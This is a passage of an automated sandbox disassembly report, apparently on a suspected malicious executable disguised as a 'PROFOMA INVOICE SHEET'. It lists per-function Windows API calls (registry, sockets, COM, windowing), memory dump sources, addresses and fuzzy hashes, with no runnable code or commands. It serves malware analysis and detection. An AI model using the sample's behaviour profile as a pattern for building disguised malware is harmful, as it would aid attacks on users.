                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateHandlePipe
                                    • String ID: nul
                                    • API String ID: 1424370930-2873401336
                                    • Opcode ID: 9c3201fc3f263bf4d62ea01e280dabc812f7e29955eb2126e72be22c8fe45ddb
                                    • Instruction ID: 8cfdf87f26fe4a988de32208d5bf9e6164957f511a333b2355abf52e8db586b6
                                    • Opcode Fuzzy Hash: 9c3201fc3f263bf4d62ea01e280dabc812f7e29955eb2126e72be22c8fe45ddb
                                    • Instruction Fuzzy Hash: C121AE75500305DBDB369F69CC54A9A77E8EF85730F208A1AF8A5E72E0D7B59860CB20
                                    APIs
                                      • Part of subcall function 0030600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0030604C
                                      • Part of subcall function 0030600E: GetStockObject.GDI32(00000011), ref: 00306060
                                      • Part of subcall function 0030600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0030606A
                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00394112
                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0039411F
                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0039412A
                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00394139
                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00394145
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$CreateObjectStockWindow
                                    • String ID: Msctls_Progress32
                                    • API String ID: 1025951953-3636473452
                                    • Opcode ID: 0131f41d19df79567ac929b254874198b6b0323c7b1e5b97c9c2c1f8ac35a22d
                                    • Instruction ID: 1ff9f687e5b247a0c2367ac9ab19e0f93e90db13094fad5ca8367b4e02abd088
                                    • Opcode Fuzzy Hash: 0131f41d19df79567ac929b254874198b6b0323c7b1e5b97c9c2c1f8ac35a22d
                                    • Instruction Fuzzy Hash: 241182B2150219BEEF129F64CC86EE77F5DEF09798F014111FA18A6190C6729C61DBA4
                                    APIs
                                      • Part of subcall function 0033D7A3: _free.LIBCMT ref: 0033D7CC
                                    • _free.LIBCMT ref: 0033D82D
                                      • Part of subcall function 003329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000), ref: 003329DE
                                      • Part of subcall function 003329C8: GetLastError.KERNEL32(00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000,00000000), ref: 003329F0
                                    • _free.LIBCMT ref: 0033D838
                                    • _free.LIBCMT ref: 0033D843
                                    • _free.LIBCMT ref: 0033D897
                                    • _free.LIBCMT ref: 0033D8A2
                                    • _free.LIBCMT ref: 0033D8AD
                                    • _free.LIBCMT ref: 0033D8B8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                    • Instruction ID: 1a230f995f2c5f033ebaa5bfd1343c98a77b0b8ed8e4375ff5fafafd137f537d
                                    • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                    • Instruction Fuzzy Hash: AB115E71940B14AAD623BFB0EC87FCB7BDCAF01700F400825B699AE292DB66B5158660
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0036DA74
                                    • LoadStringW.USER32(00000000), ref: 0036DA7B
                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0036DA91
                                    • LoadStringW.USER32(00000000), ref: 0036DA98
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0036DADC
                                    Strings
                                    • %s (%d) : ==> %s: %s %s, xrefs: 0036DAB9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: HandleLoadModuleString$Message
                                    • String ID: %s (%d) : ==> %s: %s %s
                                    • API String ID: 4072794657-3128320259
                                    • Opcode ID: 775d04e7ba44626d4a85b22ac59939073b46caeefc93c73cbf5c5a8f4404bbb1
                                    • Instruction ID: 28edc63fc753eb595f64d20fac3658be277a29236856b950c7c789347f7df5db
                                    • Opcode Fuzzy Hash: 775d04e7ba44626d4a85b22ac59939073b46caeefc93c73cbf5c5a8f4404bbb1
                                    • Instruction Fuzzy Hash: BE016DF69142087FEB12EBE4DD89EEB366CEB08301F405497B746E2041EA749E848F74
                                    APIs
                                    • InterlockedExchange.KERNEL32(0124ED60,0124ED60), ref: 0037097B
                                    • EnterCriticalSection.KERNEL32(0124ED40,00000000), ref: 0037098D
                                    • TerminateThread.KERNEL32(00000000,000001F6), ref: 0037099B
                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003709A9
                                    • CloseHandle.KERNEL32(00000000), ref: 003709B8
                                    • InterlockedExchange.KERNEL32(0124ED60,000001F6), ref: 003709C8
                                    • LeaveCriticalSection.KERNEL32(0124ED40), ref: 003709CF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                    • String ID:
                                    • API String ID: 3495660284-0
                                    • Opcode ID: d4e51fa9e2d06f75c77a953b7b17316731cda37309eb08e922990bfbb19810c4
                                    • Instruction ID: 38d31e4187e33ee7ed3425bc4b3f729a7cb70b21f99efbdd6e30f7bfded01be3
                                    • Opcode Fuzzy Hash: d4e51fa9e2d06f75c77a953b7b17316731cda37309eb08e922990bfbb19810c4
                                    • Instruction Fuzzy Hash: 42F0CD31452912EBDB565BA4EE89AD67A39BF05702F802416F241508A1C776A465CFA0
                                    APIs
                                    • __allrem.LIBCMT ref: 003300BA
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003300D6
                                    • __allrem.LIBCMT ref: 003300ED
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0033010B
                                    • __allrem.LIBCMT ref: 00330122
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00330140
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1992179935-0
                                    • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                    • Instruction ID: e4fc481187e596fa75f3edea16b63300dd9233dfb0523a374ca43c439d7b4f43
                                    • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                    • Instruction Fuzzy Hash: 06813976A00B16AFE72A9F28DC91B6BB3F8AF41720F25423AF551DB681E770D9008750
                                    APIs
                                      • Part of subcall function 00383149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,0038101C,00000000,?,?,00000000), ref: 00383195
                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00381DC0
                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00381DE1
                                    • WSAGetLastError.WSOCK32 ref: 00381DF2
                                    • inet_ntoa.WSOCK32(?), ref: 00381E8C
                                    • htons.WSOCK32(?,?,?,?,?), ref: 00381EDB
                                    • _strlen.LIBCMT ref: 00381F35
                                      • Part of subcall function 003639E8: _strlen.LIBCMT ref: 003639F2
                                      • Part of subcall function 00306D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0031CF58,?,?,?), ref: 00306DBA
                                      • Part of subcall function 00306D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0031CF58,?,?,?), ref: 00306DED
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                    • String ID:
                                    • API String ID: 1923757996-0
                                    • Opcode ID: 7c3ffe24082e871c0e0272fb3c55dad2583a6fb80d5e621a01550af711c20b35
                                    • Instruction ID: 4d852e7aba5cb84ab6d1bfbd79c96cf0a3467fa66422b8d8db28dd7540a3370d
                                    • Opcode Fuzzy Hash: 7c3ffe24082e871c0e0272fb3c55dad2583a6fb80d5e621a01550af711c20b35
                                    • Instruction Fuzzy Hash: 53A1A031104340AFC326EF24C895F2AB7A9AF84318F558A8CF5565F2E2CB71ED46CB91
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003282D9,003282D9,?,?,?,0033644F,00000001,00000001,8BE85006), ref: 00336258
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0033644F,00000001,00000001,8BE85006,?,?,?), ref: 003362DE
                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 003363D8
                                    • __freea.LIBCMT ref: 003363E5
                                      • Part of subcall function 00333820: RtlAllocateHeap.NTDLL(00000000,?,003D1444,?,0031FDF5,?,?,0030A976,00000010,003D1440,003013FC,?,003013C6,?,00301129), ref: 00333852
                                    • __freea.LIBCMT ref: 003363EE
                                    • __freea.LIBCMT ref: 00336413
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                    • String ID:
                                    • API String ID: 1414292761-0
                                    • Opcode ID: 39b438d09c79eb682a6b3e3e38ea2d7f0c899dd4de0207b6c8e43ba0bd0fb2bd
                                    • Instruction ID: 90cedf31cdbc15b4240eb7f9c51c69eff949bf95da3ca87b51b5ea0d333e6028
                                    • Opcode Fuzzy Hash: 39b438d09c79eb682a6b3e3e38ea2d7f0c899dd4de0207b6c8e43ba0bd0fb2bd
                                    • Instruction Fuzzy Hash: C251B072A00216BFEB278F64DCC2EAF77A9EB44760F168629FC05DA161DB35DC44C660
                                    APIs
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                      • Part of subcall function 0038C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0038B6AE,?,?), ref: 0038C9B5
                                      • Part of subcall function 0038C998: _wcslen.LIBCMT ref: 0038C9F1
                                      • Part of subcall function 0038C998: _wcslen.LIBCMT ref: 0038CA68
                                      • Part of subcall function 0038C998: _wcslen.LIBCMT ref: 0038CA9E
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0038BCCA
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0038BD25
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0038BD6A
                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0038BD99
                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0038BDF3
                                    • RegCloseKey.ADVAPI32(?), ref: 0038BDFF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                    • String ID:
                                    • API String ID: 1120388591-0
                                    • Opcode ID: 2a922f1e2d7ec498cb2559e73066dfeb9bce6531c7b8887754a18d88920ee49b
                                    • Instruction ID: b64d0f85515514c8d04d0e9dad101f323560c372177691aefd2fac3ae6347250
                                    • Opcode Fuzzy Hash: 2a922f1e2d7ec498cb2559e73066dfeb9bce6531c7b8887754a18d88920ee49b
                                    • Instruction Fuzzy Hash: 0A817C30208341AFD716EF24C891E2ABBE9BF84308F14859DF4554B2A2DB31ED45CB92
                                    APIs
                                    • VariantInit.OLEAUT32(00000035), ref: 0035F7B9
                                    • SysAllocString.OLEAUT32(00000001), ref: 0035F860
                                    • VariantCopy.OLEAUT32(0035FA64,00000000), ref: 0035F889
                                    • VariantClear.OLEAUT32(0035FA64), ref: 0035F8AD
                                    • VariantCopy.OLEAUT32(0035FA64,00000000), ref: 0035F8B1
                                    • VariantClear.OLEAUT32(?), ref: 0035F8BB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCopy$AllocInitString
                                    • String ID:
                                    • API String ID: 3859894641-0
                                    • Opcode ID: 7693ef764277b42cf19dc94f7076da91837ee66d304abde8086779cf98119120
                                    • Instruction ID: 5b1e3af249bdef22c1bfb131574634bfd7a7a3888babd8c9a84dc75c48e3cedc
                                    • Opcode Fuzzy Hash: 7693ef764277b42cf19dc94f7076da91837ee66d304abde8086779cf98119120
                                    • Instruction Fuzzy Hash: 8951D431601310AFCF26AB65D895F29B3A8EF45312F249467ED05DF2A6DB708C84CB96
                                    APIs
                                      • Part of subcall function 00307620: _wcslen.LIBCMT ref: 00307625
                                      • Part of subcall function 00306B57: _wcslen.LIBCMT ref: 00306B6A
                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 003794E5
                                    • _wcslen.LIBCMT ref: 00379506
                                    • _wcslen.LIBCMT ref: 0037952D
                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00379585
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen$FileName$OpenSave
                                    • String ID: X
                                    • API String ID: 83654149-3081909835
                                    • Opcode ID: a1e17d215e01b00c175fd7de371ebba5d0161d1566ee5e9b337f6e1c9826a9d7
                                    • Instruction ID: 3729453d5b0bf735a5bb4e9971b1a2d3c347ba0c4bfeb41a0635eeae71870adf
                                    • Opcode Fuzzy Hash: a1e17d215e01b00c175fd7de371ebba5d0161d1566ee5e9b337f6e1c9826a9d7
                                    • Instruction Fuzzy Hash: 98E1B4356043108FD726DF24C891B6AB7E4FF85314F058A6EF8899B2A2DB35DD05CB92
                                    APIs
                                      • Part of subcall function 00319BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00319BB2
                                    • BeginPaint.USER32(?,?,?), ref: 00319241
                                    • GetWindowRect.USER32(?,?), ref: 003192A5
                                    • ScreenToClient.USER32(?,?), ref: 003192C2
                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003192D3
                                    • EndPaint.USER32(?,?,?,?,?), ref: 00319321
                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 003571EA
                                      • Part of subcall function 00319339: BeginPath.GDI32(00000000), ref: 00319357
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                    • String ID:
                                    • API String ID: 3050599898-0
                                    • Opcode ID: 3abec1d56a0f58272751eb7fadf32127bd831c413dc905c10595b6f507543ffa
                                    • Instruction ID: e7f84af49000c56db87c64dd66b0ebcc6e0cafc0d3ee667435f80314e4ff4c5e
                                    • Opcode Fuzzy Hash: 3abec1d56a0f58272751eb7fadf32127bd831c413dc905c10595b6f507543ffa
                                    • Instruction Fuzzy Hash: 2B419031105200AFD712DF64DCA5FBA7BBCEB49321F14066AF9A48B2B1C7319985DB61
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0037080C
                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00370847
                                    • EnterCriticalSection.KERNEL32(?), ref: 00370863
                                    • LeaveCriticalSection.KERNEL32(?), ref: 003708DC
                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 003708F3
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00370921
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                    • String ID:
                                    • API String ID: 3368777196-0
                                    • Opcode ID: 233630d4e105100ea541d16e4da12f71789013c33cda71aa7c7634218a4586aa
                                    • Instruction ID: 079692f7fdd64e7bd7635ea47d9e9c51467d62c4bbbf27f21afb7bf83b285766
                                    • Opcode Fuzzy Hash: 233630d4e105100ea541d16e4da12f71789013c33cda71aa7c7634218a4586aa
                                    • Instruction Fuzzy Hash: B7416D71900205EFDF1AAF54DC85AAA77B8FF04300F1480A5ED049E297D735EE54DBA4
                                    APIs
                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0035F3AB,00000000,?,?,00000000,?,0035682C,00000004,00000000,00000000), ref: 0039824C
                                    • EnableWindow.USER32(00000000,00000000), ref: 00398272
                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 003982D1
                                    • ShowWindow.USER32(00000000,00000004), ref: 003982E5
                                    • EnableWindow.USER32(00000000,00000001), ref: 0039830B
                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0039832F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$Show$Enable$MessageSend
                                    • String ID:
                                    • API String ID: 642888154-0
                                    • Opcode ID: d1e466946e05424af0cb4fe93d78230dfc943472380f5869e8618c275e43a3e4
                                    • Instruction ID: ca083766e5551881a1acf67c3eb3b4e27c345e96833b61ce63b91e8839dd96e8
                                    • Opcode Fuzzy Hash: d1e466946e05424af0cb4fe93d78230dfc943472380f5869e8618c275e43a3e4
                                    • Instruction Fuzzy Hash: B7419438601644AFDF13CF15D899BE47BF4BB8B714F19516AE5484F262CB32A841CB50
                                    APIs
                                    • IsWindowVisible.USER32(?), ref: 00364C95
                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00364CB2
                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00364CEA
                                    • _wcslen.LIBCMT ref: 00364D08
                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00364D10
                                    • _wcsstr.LIBVCRUNTIME ref: 00364D1A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                    • String ID:
                                    • API String ID: 72514467-0
                                    • Opcode ID: dc7ef47da803f68df4699d25a21e8a7434a773af90506a3824f912eab52e615d
                                    • Instruction ID: bca4585e491344bce412f69880b8f9968a68c5e562e28ae7ec16cec49a7ff92b
                                    • Opcode Fuzzy Hash: dc7ef47da803f68df4699d25a21e8a7434a773af90506a3824f912eab52e615d
                                    • Instruction Fuzzy Hash: 1C21C672A04210BBEB175B39AC49E7BBBACDF49750F15C02AF805CE196EA61DC4196B0
                                    APIs
                                      • Part of subcall function 00303AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00303A97,?,?,00302E7F,?,?,?,00000000), ref: 00303AC2
                                    • _wcslen.LIBCMT ref: 0037587B
                                    • CoInitialize.OLE32(00000000), ref: 00375995
                                    • CoCreateInstance.OLE32(0039FCF8,00000000,00000001,0039FB68,?), ref: 003759AE
                                    • CoUninitialize.OLE32 ref: 003759CC
